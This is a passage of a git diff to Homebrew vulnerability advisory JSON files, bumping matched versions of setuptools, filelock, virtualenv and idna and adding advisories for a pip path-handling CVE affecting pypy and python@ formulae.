"virtualenv" } ] diff --git a/advisories/BREW-pipenv-CVE-2024-6345.json b/advisories/BREW-pipenv-CVE-2024-6345.json index 63f105590b6..319f3c633d9 100644 --- a/advisories/BREW-pipenv-CVE-2024-6345.json +++ b/advisories/BREW-pipenv-CVE-2024-6345.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-pipenv-CVE-2024-6345", "published": "2026-08-13T17:28:21Z", - "modified": "2026-08-13T17:28:21Z", + "modified": "2026-08-22T09:27:28Z", "upstream": [ "GHSA-cx63-2mw6-8hw5", "BIT-setuptools-2024-6345", @@ -34,7 +34,7 @@ "range_state": "fixed", "upstream_fixed_in": "70.0.0", "resource": "setuptools", - "resource_purl": "pkg:pypi/setuptools@83.0.0" + "resource_purl": "pkg:pypi/setuptools@84.0.0" } } ], @@ -47,16 +47,16 @@ "strategy": "registry", "ecosystem": "PyPI", "name": "setuptools", - "subject_version": "83.0.0", - "key": "pkg:pypi/setuptools@83.0.0", + "subject_version": "84.0.0", + "key": "pkg:pypi/setuptools@84.0.0", "resource": "setuptools" }, { "strategy": "registry", "ecosystem": "PyPI", "name": "setuptools", - "subject_version": "83.0.0", - "key": "pkg:pypi/setuptools@83.0.0", + "subject_version": "84.0.0", + "key": "pkg:pypi/setuptools@84.0.0", "resource": "setuptools" } ] diff --git a/advisories/BREW-pipenv-CVE-2025-47273.json b/advisories/BREW-pipenv-CVE-2025-47273.json index 7a10f8b4540..7653b39ebde 100644 --- a/advisories/BREW-pipenv-CVE-2025-47273.json +++ b/advisories/BREW-pipenv-CVE-2025-47273.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-pipenv-CVE-2025-47273", "published": "2026-08-13T17:28:21Z", - "modified": "2026-08-13T17:28:21Z", + "modified": "2026-08-22T09:27:28Z", "upstream": [ "GHSA-5rjg-fvgr-3xxf", "BIT-setuptools-2025-47273", @@ -34,7 +34,7 @@ "range_state": "fixed", "upstream_fixed_in": "78.1.1", "resource": "setuptools", - "resource_purl": "pkg:pypi/setuptools@83.0.0" + "resource_purl": "pkg:pypi/setuptools@84.0.0" } } ], @@ -47,16 +47,16 @@ "strategy": "registry", "ecosystem": "PyPI", "name": "setuptools", - "subject_version": "83.0.0", - "key": "pkg:pypi/setuptools@83.0.0", + "subject_version": "84.0.0", + "key": "pkg:pypi/setuptools@84.0.0", "resource": "setuptools" }, { "strategy": "registry", "ecosystem": "PyPI", "name": "setuptools", - "subject_version": "83.0.0", - "key": "pkg:pypi/setuptools@83.0.0", + "subject_version": "84.0.0", + "key": "pkg:pypi/setuptools@84.0.0", "resource": "setuptools" } ] diff --git a/advisories/BREW-pipenv-CVE-2025-68146.json b/advisories/BREW-pipenv-CVE-2025-68146.json index e7f5384517e..ceea0b137d8 100644 --- a/advisories/BREW-pipenv-CVE-2025-68146.json +++ b/advisories/BREW-pipenv-CVE-2025-68146.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-pipenv-CVE-2025-68146", "published": "2026-08-13T17:28:21Z", - "modified": "2026-08-13T17:28:21Z", + "modified": "2026-08-22T09:27:28Z", "upstream": [ "GHSA-w853-jp5j-5j7f", "CVE-2025-68146", @@ -33,7 +33,7 @@ "range_state": "fixed", "upstream_fixed_in": "3.20.1", "resource": "filelock", - "resource_purl": "pkg:pypi/filelock@3.32.2" + "resource_purl": "pkg:pypi/filelock@3.32.3" } } ], @@ -46,16 +46,16 @@ "strategy": "registry", "ecosystem": "PyPI", "name": "filelock", - "subject_version": "3.32.2", - "key": "pkg:pypi/filelock@3.32.2", + "subject_version": "3.32.3", + "key": "pkg:pypi/filelock@3.32.3", "resource": "filelock" }, { "strategy": "registry", "ecosystem": "PyPI", "name": "filelock", - "subject_version": "3.32.2", - "key": "pkg:pypi/filelock@3.32.2", + "subject_version": "3.32.3", + "key": "pkg:pypi/filelock@3.32.3", "resource": "filelock" } ] diff --git a/advisories/BREW-pipenv-CVE-2026-22701.json b/advisories/BREW-pipenv-CVE-2026-22701.json index fbbd7bc1f1e..fd52e829e43 100644 --- a/advisories/BREW-pipenv-CVE-2026-22701.json +++ b/advisories/BREW-pipenv-CVE-2026-22701.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-pipenv-CVE-2026-22701", "published": "2026-08-13T17:28:21Z", - "modified": "2026-08-13T17:28:21Z", + "modified": "2026-08-22T09:27:28Z", "upstream": [ "GHSA-qmgc-5h2g-mvrw", "CVE-2026-22701", @@ -33,7 +33,7 @@ "range_state": "fixed", "upstream_fixed_in": "3.20.3", "resource": "filelock", - "resource_purl": "pkg:pypi/filelock@3.32.2" + "resource_purl": "pkg:pypi/filelock@3.32.3" } } ], @@ -46,16 +46,16 @@ "strategy": "registry", "ecosystem": "PyPI", "name": "filelock", - "subject_version": "3.32.2", - "key": "pkg:pypi/filelock@3.32.2", + "subject_version": "3.32.3", + "key": "pkg:pypi/filelock@3.32.3", "resource": "filelock" }, { "strategy": "registry", "ecosystem": "PyPI", "name": "filelock", - "subject_version": "3.32.2", - "key": "pkg:pypi/filelock@3.32.2", + "subject_version": "3.32.3", + "key": "pkg:pypi/filelock@3.32.3", "resource": "filelock" } ] diff --git a/advisories/BREW-pipenv-CVE-2026-22702.json b/advisories/BREW-pipenv-CVE-2026-22702.json index d7215500e87..6cf0ff5e826 100644 --- a/advisories/BREW-pipenv-CVE-2026-22702.json +++ b/advisories/BREW-pipenv-CVE-2026-22702.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-pipenv-CVE-2026-22702", "published": "2026-08-13T17:28:21Z", - "modified": "2026-08-13T17:28:21Z", + "modified": "2026-08-22T09:27:28Z", "upstream": [ "GHSA-597g-3phw-6986", "BIT-virtualenv-2026-22702", @@ -34,7 +34,7 @@ "range_state": "fixed", "upstream_fixed_in": "20.36.1", "resource": "virtualenv", - "resource_purl": "pkg:pypi/virtualenv@21.7.1" + "resource_purl": "pkg:pypi/virtualenv@21.7.4" } } ], @@ -47,16 +47,16 @@ "strategy": "registry", "ecosystem": "PyPI", "name": "virtualenv", - "subject_version": "21.7.1", - "key": "pkg:pypi/virtualenv@21.7.1", + "subject_version": "21.7.4", + "key": "pkg:pypi/virtualenv@21.7.4", "resource": "virtualenv" }, { "strategy": "registry", "ecosystem": "PyPI", "name": "virtualenv", - "subject_version": "21.7.1", - "key": "pkg:pypi/virtualenv@21.7.1", + "subject_version": "21.7.4", + "key": "pkg:pypi/virtualenv@21.7.4", "resource": "virtualenv" } ] diff --git a/advisories/BREW-pipenv-CVE-2026-59890.json b/advisories/BREW-pipenv-CVE-2026-59890.json index 79957242a66..0c817b340f1 100644 --- a/advisories/BREW-pipenv-CVE-2026-59890.json +++ b/advisories/BREW-pipenv-CVE-2026-59890.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-pipenv-CVE-2026-59890", "published": "2026-08-13T17:28:21Z", - "modified": "2026-08-13T17:28:21Z", + "modified": "2026-08-22T09:27:28Z", "upstream": [ "GHSA-h35f-9h28-mq5c", "BIT-setuptools-2026-59890", @@ -34,7 +34,7 @@ "range_state": "fixed", "upstream_fixed_in": "83.0.0", "resource": "setuptools", - "resource_purl": "pkg:pypi/setuptools@83.0.0" + "resource_purl": "pkg:pypi/setuptools@84.0.0" } } ], @@ -47,16 +47,16 @@ "strategy": "registry", "ecosystem": "PyPI", "name": "setuptools", - "subject_version": "83.0.0", - "key": "pkg:pypi/setuptools@83.0.0", + "subject_version": "84.0.0", + "key": "pkg:pypi/setuptools@84.0.0", "resource": "setuptools" }, { "strategy": "registry", "ecosystem": "PyPI", "name": "setuptools", - "subject_version": "83.0.0", - "key": "pkg:pypi/setuptools@83.0.0", + "subject_version": "84.0.0", + "key": "pkg:pypi/setuptools@84.0.0", "resource": "setuptools" } ] diff --git a/advisories/BREW-prowler-CVE-2026-59939.json b/advisories/BREW-prowler-CVE-2026-59939.json index 240ba0a5ffd..ab2337c692b 100644 --- a/advisories/BREW-prowler-CVE-2026-59939.json +++ b/advisories/BREW-prowler-CVE-2026-59939.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-prowler-CVE-2026-59939", "published": "2026-08-13T17:29:23Z", - "modified": "2026-08-13T17:29:23Z", + "modified": "2026-08-22T09:28:22Z", "upstream": [ "GHSA-j5g9-f88f-gfj3", "CVE-2026-59939", @@ -92,6 +92,10 @@ { "type": "WEB", "url": "https://github.com/pypa/advisory-database/tree/main/vulns/httplib2/PYSEC-2026-3444.yaml" + }, + { + "type": "WEB", + "url": "https://lists.debian.org/debian-lts-announce/2026/08/msg00039.html" } ] } diff --git a/advisories/BREW-pulp-cli-CVE-2024-3651.json b/advisories/BREW-pulp-cli-CVE-2024-3651.json index 189db59fb2a..8a47d0e7bd4 100644 --- a/advisories/BREW-pulp-cli-CVE-2024-3651.json +++ b/advisories/BREW-pulp-cli-CVE-2024-3651.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-pulp-cli-CVE-2024-3651", "published": "2026-08-13T17:29:24Z", - "modified": "2026-08-13T17:29:24Z", + "modified": "2026-08-22T09:28:22Z", "upstream": [ "GHSA-jjg7-2v4v-x38h", "CVE-2024-3651", @@ -33,7 +33,7 @@ "range_state": "fixed", "upstream_fixed_in": "3.7", "resource": "idna", - "resource_purl": "pkg:pypi/idna@3.18" + "resource_purl": "pkg:pypi/idna@3.19" } } ], @@ -46,16 +46,16 @@ "strategy": "registry", "ecosystem": "PyPI", "name": "idna", - "subject_version": "3.18", - "key": "pkg:pypi/idna@3.18", + "subject_version": "3.19", + "key": "pkg:pypi/idna@3.19", "resource": "idna" }, { "strategy": "registry", "ecosystem": "PyPI", "name": "idna", - "subject_version": "3.18", - "key": "pkg:pypi/idna@3.18", + "subject_version": "3.19", + "key": "pkg:pypi/idna@3.19", "resource": "idna" } ] diff --git a/advisories/BREW-pulp-cli-CVE-2026-45409.json b/advisories/BREW-pulp-cli-CVE-2026-45409.json index c6dadf19558..05b123ef7ac 100644 --- a/advisories/BREW-pulp-cli-CVE-2026-45409.json +++ b/advisories/BREW-pulp-cli-CVE-2026-45409.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-pulp-cli-CVE-2026-45409", "published": "2026-08-13T17:29:24Z", - "modified": "2026-08-13T17:29:24Z", + "modified": "2026-08-22T09:28:22Z", "upstream": [ "GHSA-65pc-fj4g-8rjx", "CVE-2026-45409", @@ -33,7 +33,7 @@ "range_state": "fixed", "upstream_fixed_in": "3.15", "resource": "idna", - "resource_purl": "pkg:pypi/idna@3.18" + "resource_purl": "pkg:pypi/idna@3.19" } } ], @@ -46,16 +46,16 @@ "strategy": "registry", "ecosystem": "PyPI", "name": "idna", - "subject_version": "3.18", - "key": "pkg:pypi/idna@3.18", + "subject_version": "3.19", + "key": "pkg:pypi/idna@3.19", "resource": "idna" }, { "strategy": "registry", "ecosystem": "PyPI", "name": "idna", - "subject_version": "3.18", - "key": "pkg:pypi/idna@3.18", + "subject_version": "3.19", + "key": "pkg:pypi/idna@3.19", "resource": "idna" } ] diff --git a/advisories/BREW-pypy-CVE-2026-13346.json b/advisories/BREW-pypy-CVE-2026-13346.json new file mode 100644 index 00000000000..9264a570e9d --- /dev/null +++ b/advisories/BREW-pypy-CVE-2026-13346.json @@ -0,0 +1,72 @@ +{ + "schema_version": "1.7.3", + "id": "BREW-pypy-CVE-2026-13346", + "published": "2026-08-22T09:28:42Z", + "modified": "2026-08-22T09:28:42Z", + "upstream": [ + "PYSEC-2026-3721", + "CVE-2026-13346" + ], + "affected": [ + { + "package": { + "ecosystem": "Homebrew", + "name": "pypy", + "purl": "pkg:brew/pypy" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + } + ] + } + ], + "ecosystem_specific": { + "fix": null, + "range_state": "affected", + "upstream_fixed_in": "26.2", + "resource": "pip", + "resource_purl": "pkg:pypi/pip@20.3.4" + } + } + ], + "database_specific": { + "source": "matched", + "strategy": "registry", + "confidence": "high", + "upstream_evidence": [ + { + "strategy": "registry", + "ecosystem": "PyPI", + "name": "pip", + "subject_version": "20.3.4", + "key": "pkg:pypi/pip@20.3.4", + "resource": "pip" + } + ] + }, + "details": "pip would incorrectly handle doubly-encoded package URLs from indexes allowing for files to be installed to arbitrary locations on disk even when installing wheels.\n\n\n\n\nThis vulnerability requires downloading or installing a package from a malicious package index to succeed, malicious packages alone are not able to exploit this vulnerability. Note that this vulnerability only materially impacts users running `pip download` with the `--only-binary` option as installing source distributions from an untrusted index is already an unsafe operation that executes code during install time.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N" + } + ], + "references": [ + { + "type": "ADVISORY", + "url": "http://www.openwall.com/lists/oss-security/2026/07/29/7" + }, + { + "type": "ADVISORY", + "url": "https://mail.python.org/archives/list/security-announce@python.org/thread/L2BNQGGVQCEV7DROOORQ7WFKKFF2OOQX/" + }, + { + "type": "FIX", + "url": "https://github.com/pypa/pip/pull/14110" + } + ] +} diff --git a/advisories/BREW-pypy3.10-CVE-2026-13346.json b/advisories/BREW-pypy3.10-CVE-2026-13346.json new file mode 100644 index 00000000000..008382abd27 --- /dev/null +++ b/advisories/BREW-pypy3.10-CVE-2026-13346.json @@ -0,0 +1,72 @@ +{ + "schema_version": "1.7.3", + "id": "BREW-pypy3.10-CVE-2026-13346", + "published": "2026-08-22T09:28:42Z", + "modified": "2026-08-22T09:28:42Z", + "upstream": [ + "PYSEC-2026-3721", + "CVE-2026-13346" + ], + "affected": [ + { + "package": { + "ecosystem": "Homebrew", + "name": "pypy3.10", + "purl": "pkg:brew/pypy3.10" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + } + ] + } + ], + "ecosystem_specific": { + "fix": null, + "range_state": "affected", + "upstream_fixed_in": "26.2", + "resource": "pip", + "resource_purl": "pkg:pypi/pip@23.3.2" + } + } + ], + "database_specific": { + "source": "matched", + "strategy": "registry", + "confidence": "high", + "upstream_evidence": [ + { + "strategy": "registry", + "ecosystem": "PyPI", + "name": "pip", + "subject_version": "23.3.2", + "key": "pkg:pypi/pip@23.3.2", + "resource": "pip" + } + ] + }, + "details": "pip would incorrectly handle doubly-encoded package URLs from indexes allowing for files to be installed to arbitrary locations on disk even when installing wheels.\n\n\n\n\nThis vulnerability requires downloading or installing a package from a malicious package index to succeed, malicious packages alone are not able to exploit this vulnerability. Note that this vulnerability only materially impacts users running `pip download` with the `--only-binary` option as installing source distributions from an untrusted index is already an unsafe operation that executes code during install time.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N" + } + ], + "references": [ + { + "type": "ADVISORY", + "url": "http://www.openwall.com/lists/oss-security/2026/07/29/7" + }, + { + "type": "ADVISORY", + "url": "https://mail.python.org/archives/list/security-announce@python.org/thread/L2BNQGGVQCEV7DROOORQ7WFKKFF2OOQX/" + }, + { + "type": "FIX", + "url": "https://github.com/pypa/pip/pull/14110" + } + ] +} diff --git a/advisories/BREW-pypy3.11-CVE-2026-13346.json b/advisories/BREW-pypy3.11-CVE-2026-13346.json new file mode 100644 index 00000000000..fb652472330 --- /dev/null +++ b/advisories/BREW-pypy3.11-CVE-2026-13346.json @@ -0,0 +1,72 @@ +{ + "schema_version": "1.7.3", + "id": "BREW-pypy3.11-CVE-2026-13346", + "published": "2026-08-22T09:28:42Z", + "modified": "2026-08-22T09:28:42Z", + "upstream": [ + "PYSEC-2026-3721", + "CVE-2026-13346" + ], + "affected": [ + { + "package": { + "ecosystem": "Homebrew", + "name": "pypy3.11", + "purl": "pkg:brew/pypy3.11" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + } + ] + } + ], + "ecosystem_specific": { + "fix": null, + "range_state": "affected", + "upstream_fixed_in": "26.2", + "resource": "pip", + "resource_purl": "pkg:pypi/pip@26.1.2" + } + } + ], + "database_specific": { + "source": "matched", + "strategy": "registry", + "confidence": "high", + "upstream_evidence": [ + { + "strategy": "registry", + "ecosystem": "PyPI", + "name": "pip", + "subject_version": "26.1.2", + "key": "pkg:pypi/pip@26.1.2", + "resource": "pip" + } + ] + }, + "details": "pip would incorrectly handle doubly-encoded package URLs from indexes allowing for files to be installed to arbitrary locations on disk even when installing wheels.\n\n\n\n\nThis vulnerability requires downloading or installing a package from a malicious package index to succeed, malicious packages alone are not able to exploit this vulnerability. Note that this vulnerability only materially impacts users running `pip download` with the `--only-binary` option as installing source distributions from an untrusted index is already an unsafe operation that executes code during install time.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N" + } + ], + "references": [ + { + "type": "ADVISORY", + "url": "http://www.openwall.com/lists/oss-security/2026/07/29/7" + }, + { + "type": "ADVISORY", + "url": "https://mail.python.org/archives/list/security-announce@python.org/thread/L2BNQGGVQCEV7DROOORQ7WFKKFF2OOQX/" + }, + { + "type": "FIX", + "url": "https://github.com/pypa/pip/pull/14110" + } + ] +} diff --git a/advisories/BREW-pypy3.9-CVE-2026-13346.json b/advisories/BREW-pypy3.9-CVE-2026-13346.json new file mode 100644 index 00000000000..ad118d4a66e --- /dev/null +++ b/advisories/BREW-pypy3.9-CVE-2026-13346.json @@ -0,0 +1,72 @@ +{ + "schema_version": "1.7.3", + "id": "BREW-pypy3.9-CVE-2026-13346", + "published": "2026-08-22T09:28:42Z", + "modified": "2026-08-22T09:28:42Z", + "upstream": [ + "PYSEC-2026-3721", + "CVE-2026-13346" + ], + "affected": [ + { + "package": { + "ecosystem": "Homebrew", + "name": "pypy3.9", + "purl": "pkg:brew/pypy3.9" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + } + ] + } + ], + "ecosystem_specific": { + "fix": null, + "range_state": "affected", + "upstream_fixed_in": "26.2", + "resource": "pip", + "resource_purl": "pkg:pypi/pip@24.0" + } + } + ], + "database_specific": { + "source": "matched", + "strategy": "registry", + "confidence": "high", + "upstream_evidence": [ + { + "strategy": "registry", + "ecosystem": "PyPI", + "name": "pip", + "subject_version": "24.0", + "key": "pkg:pypi/pip@24.0", + "resource": "pip" + } + ] + }, + "details": "pip would incorrectly handle doubly-encoded package URLs from indexes allowing for files to be installed to arbitrary locations on disk even when installing wheels.\n\n\n\n\nThis vulnerability requires downloading or installing a package from a malicious package index to succeed, malicious packages alone are not able to exploit this vulnerability. Note that this vulnerability only materially impacts users running `pip download` with the `--only-binary` option as installing source distributions from an untrusted index is already an unsafe operation that executes code during install time.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N" + } + ], + "references": [ + { + "type": "ADVISORY", + "url": "http://www.openwall.com/lists/oss-security/2026/07/29/7" + }, + { + "type": "ADVISORY", + "url": "https://mail.python.org/archives/list/security-announce@python.org/thread/L2BNQGGVQCEV7DROOORQ7WFKKFF2OOQX/" + }, + { + "type": "FIX", + "url": "https://github.com/pypa/pip/pull/14110" + } + ] +} diff --git a/advisories/BREW-python-freethreading-CVE-2026-13346.json b/advisories/BREW-python-freethreading-CVE-2026-13346.json new file mode 100644 index 00000000000..0be2774148d --- /dev/null +++ b/advisories/BREW-python-freethreading-CVE-2026-13346.json @@ -0,0 +1,75 @@ +{ + "schema_version": "1.7.3", + "id": "BREW-python-freethreading-CVE-2026-13346", + "published": "2026-08-22T09:28:42Z", + "modified": "2026-08-22T09:28:42Z", + "upstream": [ + "PYSEC-2026-3721", + "CVE-2026-13346" + ], + "affected": [ + { + "package": { + "ecosystem": "Homebrew", + "name": "python-freethreading", + "purl": "pkg:brew/python-freethreading" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "fixed": "3.14.7" + } + ] + } + ], + "ecosystem_specific": { + "fix": "bump", + "range_state": "fixed", + "upstream_fixed_in": "26.2", + "resource": "pip", + "resource_purl": "pkg:pypi/pip@26.2.1" + } + } + ], + "database_specific": { + "source": "matched", + "strategy": "registry", + "confidence": "high", + "upstream_evidence": [ + { + "strategy": "registry", + "ecosystem": "PyPI", + "name": "pip", + "subject_version": "26.2.1", + "key": "pkg:pypi/pip@26.2.1", + "resource": "pip" + } + ] + }, + "details": "pip would incorrectly handle doubly-encoded package URLs from indexes allowing for files to be installed to arbitrary locations on disk even when installing wheels.\n\n\n\n\nThis vulnerability requires downloading or installing a package from a malicious package index to succeed, malicious packages alone are not able to exploit this vulnerability. Note that this vulnerability only materially impacts users running `pip download` with the `--only-binary` option as installing source distributions from an untrusted index is already an unsafe operation that executes code during install time.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N" + } + ], + "references": [ + { + "type": "ADVISORY", + "url": "http://www.openwall.com/lists/oss-security/2026/07/29/7" + }, + { + "type": "ADVISORY", + "url": "https://mail.python.org/archives/list/security-announce@python.org/thread/L2BNQGGVQCEV7DROOORQ7WFKKFF2OOQX/" + }, + { + "type": "FIX", + "url": "https://github.com/pypa/pip/pull/14110" + } + ] +} diff --git a/advisories/BREW-python@3.10-CVE-2026-13346.json b/advisories/BREW-python@3.10-CVE-2026-13346.json new file mode 100644 index 00000000000..5f2ad47b40f --- /dev/null +++ b/advisories/BREW-python@3.10-CVE-2026-13346.json @@ -0,0 +1,75 @@ +{ + "schema_version": "1.7.3", + "id": "BREW-python@3.10-CVE-2026-13346", + "published": "2026-08-22T09:28:52Z", + "modified": "2026-08-22T09:28:52Z", + "upstream": [ + "PYSEC-2026-3721", + "CVE-2026-13346" + ], + "affected": [ + { + "package": { + "ecosystem": "Homebrew", + "name": "python@3.10", + "purl": "pkg:brew/python%403.10" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "fixed": "3.10.21" + } + ] + } + ], + "ecosystem_specific": { + "fix": "bump", + "range_state": "fixed", + "upstream_fixed_in": "26.2", + "resource": "pip", + "resource_purl": "pkg:pypi/pip@26.2.1" + } + } + ], + "database_specific": { + "source": "matched", + "strategy": "registry", + "confidence": "high", + "upstream_evidence": [ + { + "strategy": "registry", + "ecosystem": "PyPI", + "name": "pip", + "subject_version": "26.2.1", + "key": "pkg:pypi/pip@26.2.1", + "resource": "pip" + } + ] + }, + "details": "pip would incorrectly handle doubly-encoded package URLs from indexes allowing for files to be installed to arbitrary locations on disk even when installing wheels.\n\n\n\n\nThis vulnerability requires downloading or installing a package from a malicious package index to succeed, malicious packages alone are not able to exploit this vulnerability. Note that this vulnerability only materially impacts users running `pip download` with the `--only-binary` option as installing source distributions from an untrusted index is already an unsafe operation that executes code during install time.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N" + } + ], + "references": [ + { + "type": "ADVISORY", + "url": "http://www.openwall.com/lists/oss-security/2026/07/29/7" + }, + { + "type": "ADVISORY", + "url": "https://mail.python.org/archives/list/security-announce@python.org/thread/L2BNQGGVQCEV7DROOORQ7WFKKFF2OOQX/" + }, + { + "type": "FIX", + "url": "https://github.com/pypa/pip/pull/14110" + } + ] +} diff --git a/advisories/BREW-python@3.11-CVE-2026-13346.json b/advisories/BREW-python@3.11-CVE-2026-13346.json new file mode 100644 index 00000000000..fc13d9c6340 --- /dev/null +++ b/advisories/BREW-python@3.11-CVE-2026-13346.json @@ -0,0 +1,75 @@ +{ + "schema_version": "1.7.3", + "id": "BREW-python@3.11-CVE-2026-13346", + "published": "2026-08-22T09:28:52Z", + "modified": "2026-08-22T09:28:52Z", + "upstream": [ + "PYSEC-2026-3721", + "CVE-2026-13346" + ], + "affected": [ + { + "package": { + "ecosystem": "Homebrew", + "name": "python@3.11", + "purl": "pkg:brew/python%403.11" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "fixed": "3.11.16" + } + ] + } + ], + "ecosystem_specific": { + "fix": "bump", + "range_state": "fixed", + "upstream_fixed_in": "26.2", + "resource": "pip", + "resource_purl": "pkg:pypi/pip@26.2.1" + } + } + ], + "database_specific": { + "source": "matched", + "strategy": "registry", + "confidence": "high", + "upstream_evidence": [ + { + "strategy": "registry", + "ecosystem": "PyPI", + "name": "pip", + "subject_version": "26.2.1", + "key": "pkg:pypi/pip@26.2.1", + "resource": "pip" + } + ] + }, + "details": "pip would incorrectly handle doubly-encoded package URLs from indexes allowing for files to be installed to arbitrary locations on disk even when installing wheels.\n\n\n\n\nThis vulnerability requires downloading or installing a package from a malicious package index to succeed, malicious packages alone are not able to exploit this vulnerability. Note that this vulnerability only materially impacts users running `pip download` with the `--only-binary` option as installing source distributions from an untrusted index is already an unsafe operation that executes code during install time.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N" + } + ], + "references": [ + { + "type": "ADVISORY", + "url": "http://www.openwall.com/lists/oss-security/2026/07/29/7" + }, + { + "type": "ADVISORY", + "url": "https://mail.python.org/archives/list/security-announce@python.org/thread/L2BNQGGVQCEV7DROOORQ7WFKKFF2OOQX/" + }, + { + "type": "FIX", + "url": "https://github.com/pypa/pip/pull/14110" + } + ] +} diff --git a/advisories/BREW-python@3.12-CVE-2026-13346.json b/advisories/BREW-python@3.12-CVE-2026-13346.json new file mode 100644 index 00000000000..3b79041d51e --- /dev/null +++ b/advisories/BREW-python@3.12-CVE-2026-13346.json @@ -0,0 +1,75 @@ +{ + "schema_version": "1.7.3", + "id": "BREW-python@3.12-CVE-2026-13346", + "published": "2026-08-22T09:30:06Z", + "modified": "2026-08-22T09:30:06Z", + "upstream": [ + "PYSEC-2026-3721", + "CVE-2026-13346" + ], + "affected": [ + { + "package": { + "ecosystem": "Homebrew", + "name": "python@3.12", + "purl": "pkg:brew/python%403.12" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "fixed": "3.12.14" + } + ] + } + ], + "ecosystem_specific": { + "fix": "bump", + "range_state": "fixed", + "upstream_fixed_in": "26.2", + "resource": "pip", + "resource_purl": "pkg:pypi/pip@26.2.1" + } + } + ], + "database_specific": { + "source": "matched", + "strategy": "registry", + "confidence": "high", + "upstream_evidence": [ + { + "strategy": "registry", + "ecosystem": "PyPI", + "name": "pip", + "subject_version": "26.2.1", + "key": "pkg:pypi/pip@26.2.1", + "resource": "pip" + } + ] + }, + "details": "pip would incorrectly handle doubly-encoded package URLs from indexes allowing for files to be installed to arbitrary locations on disk even when installing wheels.\n\n\n\n\nThis vulnerability requires downloading or installing a package from a malicious package index to succeed, malicious packages alone are not able to exploit this vulnerability. Note that this vulnerability only materially impacts users running `pip download` with the `--only-binary` option as installing source distributions from an untrusted index is already an unsafe operation that executes code during install time.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N" + } + ], + "references": [ + { + "type": "ADVISORY", + "url": "http://www.openwall.com/lists/oss-security/2026/07/29/7" + }, + { + "type": "ADVISORY", + "url": "https://mail.python.org/archives/list/security-announce@python.org/thread/L2BNQGGVQCEV7DROOORQ7WFKKFF2OOQX/" + }, + { + "type": "FIX", + "url": "https://github.com/pypa/pip/pull/14110" + } + ] +} diff --git a/advisories/BREW-python@3.13-CVE-2026-13346.json b/advisories/BREW-python@3.13-CVE-2026-13346.json new file mode 100644 index 00000000000..7b05484418a --- /dev/null +++ b/advisories/BREW-python@3.13-CVE-2026-13346.json @@ -0,0 +1,75 @@ +{ + "schema_version": "1.7.3", + "id": "BREW-python@3.13-CVE-2026-13346", + "published": "2026-08-22T09:30:06Z", + "modified": "2026-08-22T09:30:06Z", + "upstream": [ + "PYSEC-2026-3721", + "CVE-2026-13346" + ], + "affected": [ + { + "package": { + "ecosystem": "Homebrew", + "name": "python@3.13", + "purl": "pkg:brew/python%403.13" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "fixed": "3.13.15" + } + ] + } + ], + "ecosystem_specific": { + "fix": "bump", + "range_state": "fixed", + "upstream_fixed_in": "26.2", + "resource": "pip", + "resource_purl": "pkg:pypi/pip@26.2" + } + } + ], + "database_specific": { + "source": "matched", + "strategy": "registry", + "confidence": "high", + "upstream_evidence": [ + { + "strategy": "registry", + "ecosystem": "PyPI", + "name": "pip", + "subject_version": "26.2", + "key": "pkg:pypi/pip@26.2", + "resource": "pip" + } + ] + }, + "details": "pip would incorrectly handle doubly-encoded package URLs from indexes allowing for files to be installed to arbitrary locations on disk even when installing wheels.\n\n\n\n\nThis vulnerability requires downloading or installing a package from a malicious package index to succeed, malicious packages alone are not able to exploit this vulnerability. Note that this vulnerability only materially impacts users running `pip download` with the `--only-binary` option as installing source distributions from an untrusted index is already an unsafe operation that executes code during install time.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N" + } + ], + "references": [ + { + "type": "ADVISORY", + "url": "http://www.openwall.com/lists/oss-security/2026/07/29/7" + }, + { + "type": "ADVISORY", + "url": "https://mail.python.org/archives/list/security-announce@python.org/thread/L2BNQGGVQCEV7DROOORQ7WFKKFF2OOQX/" + }, + { + "type": "FIX", + "url": "https://github.com/pypa/pip/pull/14110" + } + ] +} diff --git a/advisories/BREW-python@3.14-CVE-2026-13346.json 